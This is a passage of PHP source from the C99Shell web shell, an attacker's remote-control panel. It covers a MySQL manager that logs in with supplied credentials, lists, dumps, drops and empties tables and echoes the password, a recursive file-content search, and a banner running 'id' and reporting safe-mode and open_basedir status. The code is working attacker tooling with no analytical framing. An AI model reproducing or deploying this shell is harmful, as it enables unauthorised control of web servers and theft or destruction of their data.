 663 } 
 664 if (!function_exists("mysql_query_form")) 
 665 { 
 666 function mysql_query_form() 
 667 { 
 668 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
 669 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
 670 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
 671 if ((!$submit) or ($sql_act)) 
 672 { 
 673   echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
 674   if ($tbl_struct) 
 675   { 
 676    echo "<td valign=\"top\"><b>Fields:</b><br>"; 
 677    foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
 678    echo "</td></tr></table>"; 
 679   } 
 680 } 
 681 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
 682 } 
 683 } 
 684 if (!function_exists("mysql_create_db")) 
 685 { 
 686 function mysql_create_db($db,$sock="") 
 687 { 
 688 $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
 689 if ($sock) {return mysql_query($sql,$sock);} 
 690 else {return mysql_query($sql);} 
 691 } 
 692 } 
 693 if (!function_exists("mysql_query_parse")) 
 694 { 
 695 function mysql_query_parse($query) 
 696 { 
 697 $query = trim($query); 
 698 $arr = explode (" ",$query); 
 699 /*array array() 
 700 { 
 701   "METHOD"=>array(output_type), 
 702   "METHOD1"... 
 703   ... 
 704 } 
 705 if output_type == 0, no output, 
 706 if output_type == 1, no output if no error 
 707 if output_type == 2, output without control-buttons 
 708 if output_type == 3, output with control-buttons 
 709 */ 
 710 $types = array( 
 711   "SELECT"=>array(3,1), 
 712   "SHOW"=>array(2,1), 
 713   "DELETE"=>array(1), 
 714   "DROP"=>array(1) 
 715 ); 
 716 $result = array(); 
 717 $op = strtoupper($arr[0]); 
 718 if (is_array($types[$op])) 
 719 { 
 720   $result["propertions"] = $types[$op]; 
 721   $result["query"]  = $query; 
 722   if ($types[$op] == 2) 
 723   { 
 724    foreach($arr as $k=>$v) 
 725    { 
 726     if (strtoupper($v) == "LIMIT") 
 727     { 
 728      $result["limit"] = $arr[$k+1]; 
 729      $result["limit"] = explode(",",$result["limit"]); 
 730      if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
 731      unset($arr[$k],$arr[$k+1]); 
 732     } 
 733    } 
 734   } 
 735 } 
 736 else {return FALSE;} 
 737 } 
 738 } 
 739 if (!function_exists("c99fsearch")) 
 740 { 
 741 function c99fsearch($d) 
 742 { 
 743 global $found; 
 744 global $found_d; 
 745 global $found_f; 
 746 global $search_i_f; 
 747 global $search_i_d; 
 748 global $a; 
 749 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
 750 $h = opendir($d); 
 751 while (($f = readdir($h)) !== FALSE) 
 752 { 
 753   if($f != "." && $f != "..") 
 754   { 
 755    $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
 756    if (is_dir($d.$f)) 
 757    { 
 758     $search_i_d++; 
 759     if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
 760     if (!is_link($d.$f)) {c99fsearch($d.$f);} 
 761    } 
 762    else 
 763    { 
 764     $search_i_f++; 
 765     if ($bool) 
 766     { 
 767      if (!empty($a["text"])) 
 768      { 
 769       $r = @file_get_contents($d.$f); 
 770       if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
 771       if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
 772       if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
 773       else {$bool = strpos(" ".$r,$a["text"],1);} 
 774       if ($a["text_not"]) {$bool = !$bool;} 
 775       if ($bool) {$found[] = $d.$f; $found_f++;} 
 776      } 
 777      else {$found[] = $d.$f; $found_f++;} 
 778     } 
 779    } 
 780   } 
 781 } 
 782 closedir($h); 
 783 } 
 784 } 
 785 if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
 786 //Sending headers 
 787 @ob_start(); 
 788 @ob_implicit_flush(0); 
 789 function onphpshutdown() 
 790 { 
 791 global $gzipencode,$ft; 
 792 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
 793 { 
 794   $v = @ob_get_contents(); 
 795   @ob_end_clean(); 
 796   @ob_start("ob_gzHandler"); 
 797   echo $v; 
 798   @ob_end_flush(); 
 799 } 
 800 } 
 801 function c99shexit() 
 802 { 
 803 onphpshutdown(); 
 804 exit; 
 805 } 
 806 header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
 807 header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
 808 header("Cache-Control: no-store, no-cache, must-revalidate"); 
 809 header("Cache-Control: post-check=0, pre-check=0", FALSE); 
 810 header("Pragma: no-cache"); 
 811 if (empty($tmpdir)) 
 812 { 
 813 $tmpdir = ini_get("upload_tmp_dir"); 
 814 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
 815 } 
 816 $tmpdir = realpath($tmpdir); 
 817 $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
 818 if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
 819 if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
 820 else {$tmpdir_logs = realpath($tmpdir_logs);} 
 821 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
 822 { 
 823 $safemode = TRUE; 
 824 $hsafemode = "<font color=red>ON (secure)</font>"; 
 825 } 
 826 else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
 827 $v = @ini_get("open_basedir"); 
 828 if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
 829 else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
 830 $sort = htmlspecialchars($sort); 
 831 if (empty($sort)) {$sort = $sort_default;} 
 832 $sort[1] = strtolower($sort[1]); 
 833 $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
 834 if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
 835 $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
 836 @ini_set("highlight.bg",$highlight_bg); //FFFFFF 
 837 @ini_set("highlight.comment",$highlight_comment); //#FF8000 
 838 @ini_set("highlight.default",$highlight_default); //#0000BB 
 839 @ini_set("highlight.html",$highlight_html); //#000000 
 840 @ini_set("highlight.keyword",$highlight_keyword); //#007700 
 841 @ini_set("highlight.string",$highlight_string); //#DD0000 
 842 if (!is_array($actbox)) {$actbox = array();} 
 843 $dspact = $act = htmlspecialchars($act); 
 844 $disp_fullpath = $ls_arr = $notls = null; 
 845 $ud = urlencode($d); 
 846 ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php 
 847 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
 848 if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
 849 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
 850 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
 851 $d = str_replace("\\\\","\\",$d); 
 852 $dispd = htmlspecialchars($d); 
 853 $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
 854 $i = 0; 
 855 foreach($pd as $b) 
 856 { 
 857 $t = ""; 
 858 $j = 0; 
 859 foreach ($e as $r) 
 860 { 
 861   $t.= $r.DIRECTORY_SEPARATOR; 
 862   if ($j == $i) {break;} 
 863   $j++; 
 864 } 
 865 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; 
 866 $i++; 
 867 } 
 868 echo "&nbsp;&nbsp;&nbsp;"; 
 869 if (is_writable($d)) 
 870 { 
 871 $wd = TRUE; 
 872 $wdt = "<font color=green>[ ok ]</font>"; 
 873 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
 874 } 
 875 else 
 876 { 
 877 $wd = FALSE; 
 878 $wdt = "<font color=red>[ Read-Only ]</font>"; 
 879 echo "<b>".view_perms_color($d)."</b>"; 
 880 } 
 881 if (is_callable("disk_free_space")) 
 882 { 
 883 $free = disk_free_space($d); 
 884 $total = disk_total_space($d); 
 885 if ($free === FALSE) {$free = 0;} 
 886 if ($total === FALSE) {$total = 0;} 
 887 if ($free < 0) {$free = 0;} 
 888 if ($total < 0) {$total = 0;} 
 889 $used = $total-$free; 
 890 $free_percent = round(100/($total/$free),2); 
 891 echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; 
 892 } 
 893 echo "<br>"; 
 894 $letters = ""; 
 895 if ($win) 
 896 { 
 897 $v = explode("\\",$d); 
 898 $v = $v[0]; 
 899 foreach (range("a","z") as $letter) 
 900 { 
 901   $bool = $isdiskette = in_array($letter,$safemode_diskettes); 
 902   if (!$bool) {$bool = is_dir($letter.":\\");} 
 903   if ($bool) 
 904   { 
 905    $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; 
 906    if ($letter.":" != $v) {$letters .= $letter;} 
 907    else {$letters .= "<font color=green>".$letter."</font>";} 
 908    $letters .= " ]</a> "; 
 909   } 
 910 } 
 911 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
 912 } 
 913 if (count($quicklaunch) > 0) 
 914 { 
 915 foreach($quicklaunch as $item) 
 916 { 
 917   $item[1] = str_replace("%d",urlencode($d),$item[1]); 
 918   $item[1] = str_replace("%sort",$sort,$item[1]); 
 919   $v = realpath($d.".."); 
 920   if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
 921   $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
 922   echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
 923 } 
 924 } 
 925 echo "</p></td></tr></table><br>"; 
 926 if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
 927 echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
 928 if ($act == "") {$act = $dspact = "ls";} 
 929 if ($act == "sql") 
 930 { 
 931 $sql_surl = $surl."act=sql"; 
 932 if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
 933 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
 934 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
 935 if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
 936 if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
 937 $sql_surl .= "&"; 
 938 ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
 939 if ($sql_server) 
 940 { 
 941   $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
 942   $err = mysql_smarterror(); 
 943   @mysql_select_db($sql_db,$sql_sock); 
 944   if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
 945 } 
 946 else {$sql_sock = FALSE;} 
 947 echo "<b>SQL Manager:</b><br>"; 
 948 if (!$sql_sock) 
 949 { 
 950   if (!$sql_server) {echo "NO CONNECTION";} 
 951   else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
 952 } 
 953 else 
 954 { 
 955   $sqlquicklaunch = array(); 
 956   $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
 957   $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
 958   $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
 959   $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
 960   $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
 961   $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
 962   echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
 963   if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
 964   echo "</center>"; 
 965 } 
 966 echo "</td></tr><tr>"; 
 967 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } 
 968 else 
 969 { 
 970   //Start left panel 
 971   if (!empty($sql_db)) 
 972   { 
 973    ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
 974    $result = mysql_list_tables($sql_db); 
 975    if (!$result) {echo mysql_smarterror();} 
 976    else 
 977    { 
 978     echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
 979     $c = 0; 
 980     while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
 981     if (!$c) {echo "No tables found in database.";} 
 982    } 
 983   } 
 984   else 
 985   { 
 986    ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
 987    $result = mysql_list_dbs($sql_sock); 
 988    if (!$result) {echo mysql_smarterror();} 
 989    else 
 990    { 
 991     ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
 992     $c = 0; 
 993     $dbs = ""; 
 994     while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
 995     echo "<option value=\"\">Databases (".$c.")</option>"; 
 996     echo $dbs; 
 997    } 
 998    ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
 999   } 
1000   //End left panel 
1001   echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
1002   //Start center panel 
1003   $diplay = TRUE; 
1004   if ($sql_db) 
1005   { 
1006    if (!is_numeric($c)) {$c = 0;} 
1007    if ($c == 0) {$c = "no";} 
1008    echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
1009    if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
1010    echo "</b></center>"; 
1011    $acts = array("","dump"); 
1012    if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
1013    elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
1014    elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
1015    elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
1016    elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
1017    elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
1018    elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
1019    elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
1020    elseif ($sql_tbl_act == "insert") 
1021    { 
1022     if ($sql_tbl_insert_radio == 1) 
1023     { 
1024      $keys = ""; 
1025      $akeys = array_keys($sql_tbl_insert); 
1026      foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
1027      if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
1028      $values = ""; 
1029      $i = 0; 
1030      foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
1031      if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
1032      $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
1033      $sql_act = "query"; 
1034      $sql_tbl_act = "browse"; 
1035     } 
1036     elseif ($sql_tbl_insert_radio == 2) 
1037     { 
1038      $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
1039      $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
1040      $result = mysql_query($sql_query) or print(mysql_smarterror()); 
1041      $result = mysql_fetch_array($result, MYSQL_ASSOC); 
1042      $sql_act = "query"; 
1043      $sql_tbl_act = "browse"; 
1044     } 
1045    } 
1046    if ($sql_act == "query") 
1047    { 
1048     echo "<hr size=\"1\" noshade>"; 
1049     if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
1050     if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
1051     if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
1052    } 
1053    if (in_array($sql_act,$acts)) 
1054    { 
1055     ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
1056     if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
1057     if ($sql_act == "newtbl") 
1058     { 
1059      echo "<b>"; 
1060      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
1061     } 
1062     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
1063    } 
1064    elseif ($sql_act == "dump") 
1065    { 
1066     if (empty($submit)) 
1067     { 
1068      $diplay = FALSE; 
